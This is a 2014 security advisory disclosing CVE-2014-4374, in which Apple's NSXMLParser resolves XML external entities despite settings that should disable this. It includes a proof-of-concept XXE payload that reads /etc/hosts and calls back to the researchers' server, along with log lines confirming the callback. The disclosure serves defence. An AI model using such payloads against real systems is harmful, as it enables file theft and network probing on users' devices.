-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                         VSR Security Advisory
                       http://www.vsecurity.com/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: Apple Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
 Release Date: 2014-09-17
  Application: Apple iOS Foundation Framework
           Apple OS X Foundation Framework
     Versions: iOS 7.0, 7.1, OS X 10.9 - 10.9.4
     Severity: High
       Author: George D. Gal <ggal (at) vsecurity.com>
Vendor Status: Fix Available
CVE Candidate: CVE-2014-4374
    Reference: http://www.vsecurity.com/resources/advisory/20140917-1/
           http://support.apple.com/kb/HT1222

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~-----------------~
- From [1]:
"Xcode includes software development kits (SDKs) that enable you to create
  applications that run on specific versions of iOS or OS X?including
  versions different from the one you are developing on. This technology
  lets you build a single binary that takes advantage of new features when
  running on a system that supports them, and gracefully degrades when
  running on an older system. Some Apple frameworks automatically modify
  their behavior based on the SDK an application is built against for
  improved compatibility."


Vulnerability Overview
~--------------------~
In May 2014, VSR identified a vulnerability in versions 7.0 and 7.1 of
the iOS
SDK whereby the NSXMLParser class, resolves XML External Entities by default
despite documentation which indicates otherwise.  In addition, settings to
change the behavior of XML External Entity resolution appears to be
non-functional.

This vulnerability, commonly known as XXE (XML eXternal Entities) attacks
could allow for an attacker's ability to use the XML parser to carry out
attacks ranging from network port scanning, information disclosure,
denial of service, and potentially to carry out remote file retrieval.

Further review also revealed that the Foundation Framework used in OS X
10.9.x is also vulnerable.

The severity of this vulnerability varies. For example, in situations where
the application does not reflect user influenced XML, retrieval of files
may be limited, however using external HTTP entities could be used to
conduct port scans. In other scenarios if core iOS applications transmit XML
over plaintext protocols, these protocols could potentially be intercepted
to leak contents of any file on the mobile device. For App Store
applications
files which could be accessed may be limited to those under the individual
chrooted application directories, or in the case of jailbroken devices, any
file on the filesystem.


Vulnerability Details
~-------------------~

Apple's NSXMLParser documentation [2] indicates that external entity
resolution is disabled in the parser by default. However, inspection of
multiple applications running on iOS 7.0 and 7.1 now appear to resolve
external entities by default, and even when attempting to disable entity
resolution explicitly as shown below:

    [nsXmlParser setShouldResolveExternalEntities:NO];

The following source code demonstrates the flaw:


- - (void) doParse:(NSData *)data {
    
    // create and init NSXMLParser object
    NSXMLParser *nsXmlParser = [[NSXMLParser alloc] initWithData:data];
    
    // Why does the following not even work!?
    [nsXmlParser setShouldResolveExternalEntities:NO];
    
    // create and init our delegate
    VSRParser *parser = [[VSRParser alloc] initXMLParser];
    
    // set delegate
    [nsXmlParser setDelegate:parser];
    
    // parsing...
    BOOL success = [nsXmlParser parse];
    
    // test the result
    if (success) {
        NSLog(@"No errors");
        NSMutableArray *stuff = [parser tests];
        
    } else {
        NSLog(@"Error parsing document!");
    }
    
    [parser release];
    [nsXmlParser release];
    
}


When using a vulnerable input XML file as shown below, the XML parser
attempts
to perform network name resolution and access the resource defined by &http;

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag [
<!ENTITY http SYSTEM "http://iossdk-xxe.apt.vsecurity.org/";>
<!ENTITY file SYSTEM "file:///etc/hosts">
]>
<test>
    <vsr>
        <tag1>&file;</tag1>
        <tag2>&http;</tag2>
    </vsr>
</test>

The following DNS and web server log entries demonstrate attempts to resolve
&http;

2014-05-19_13:26:28.31088 ...  iossdk-xxe.apt.vsecurity.org

XX.XX.XX.XX - - [19/May/2014:09:26:28 -0400] "GET /xxe HTTP/1.0" 404 446
"-" "-"


In more serious exploitation scenarios, plaintext XML communications between
a server and iOS mobile application, or OS X client application could be
intercepted and modified in transit to reference a file present on the
client
device. If the device reflects this value in subsequent communications or
errors the contents of files stored on the device could be leaked to an
attacker

Versions Affected
~---------------~
VSR's analysis revealed that the IOS 7.0, 7.1 SDKs are vulnerable, while
earlier versions of IOS and the IOS SDK do not appear to be affected. This
vulnerability affects the Mac OSX Foundation, however VSR has not verified
the earliest version of the Foundation framework for OSX which is affected.


Vendor Response
~-------------~
The following timeline details Apple's response to the reported issue:

2014-05-19    Apple was provided a draft advisory.
2014-07-10    Apple confirms issues to be fixed in iOS 8 and OSX Yosemite
2014-09-17    Apple releases iOS 8 and OS X 10.9.5 which is presumed to
          fix this vulnerability.


Recommendation
~------------~
This vulnerability will require an updated version of iOS and OS X from
Apple, as even built-in methods for disabling XXE appears to be
non-functional. Users should update their devices to iOS 8 and OS X
Mavericks
10.9.5 with the Software Update [3] mechanism.


Common Vulnerabilities and Exposures (CVE) Information
~----------------------------------------------------~
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2014-4374 to this issue.  This is a candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

References:

1. 
https://developer.apple.com/library/ios/documentation/DeveloperTools/Conceptual/cross_development/Introduction/Introduction.html#//apple_ref/doc/uid/10000163-BCICHGIE

2. 
https://developer.apple.com/library/ios/documentation/Cocoa/Reference/Foundation/Classes/NSXMLParser_Class/Reference/Reference.html

3. http://support.apple.com/kb/HT1222


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety.  This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose.  Neither Virtual Security Research,
LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.

See the VSR disclosure policy for more information on our responsible
disclosure practices:
  http://www.vsecurity.com/company/disclosure

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     Copyright 2014 Virtual Security Research, LLC.  All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)

iQIcBAEBAgAGBQJUGmpZAAoJENaINF9fnpkCgA4QALC6+2uf7IU+cJE+BCGNlBEg
F/4PGBIvje6ZG6xJRChh+xPQvBcbCQM3hINhlkrS0y6xZz+7f2maUrK0pWt4Sy78
XhxWu+uKur4MA1cnp6TK5wqsV4dExbQzNzM1+J7SNy1DIFJIjOSlXzpAuDQcDnZl
s4R3p2ORw6yub4l6C6kax3ss/+gqkj/bGZntvynZVZKDL5Rw7bJKroYvGayxMS9V
uAU9S5kInxea3nW7C/LHpT7GJilcNVeiye1jk9sA6JwydO6uVXf32tg0TMBZhhEc
RuoWTooBMBcSlfq4ZoRfD4606kJLdrOKKG3qEoJEUsdbChrJKd58jPHrb0x80SAo
tDxR/z7EgcpW+XuN1LEEQLCO4ppvBD1qyLECQAIko1W0TGCYhWv8BqBmQmNAE4O2
MUn8soPFmqkivuBjyPNjlyERtPZsnFKU6EOR7/6MLRiXdL6q4CHMEXVn6FkCkmTF
7nHYlAL0C7a6AXU3/BD/bRASQUbR0t4HvQrB3pY3kCaPicfMFkx32ogjpj4sxkYy
n9jr22AH43RZYr511VGFLdEthUILwI3ciSw8EsVYK31DQtF5oJIs0mJc8CUwX1Jk
5xmG0CxEmCpL6O3Wc2TJO2vcZnvNPK5qwkN4tWhOiZAZmn5W/IPyZRQfIF7zPjL5
acUG5Bgr0+bU7iuCOd/M
=sLVd
-----END PGP SIGNATURE-----

Reply via email to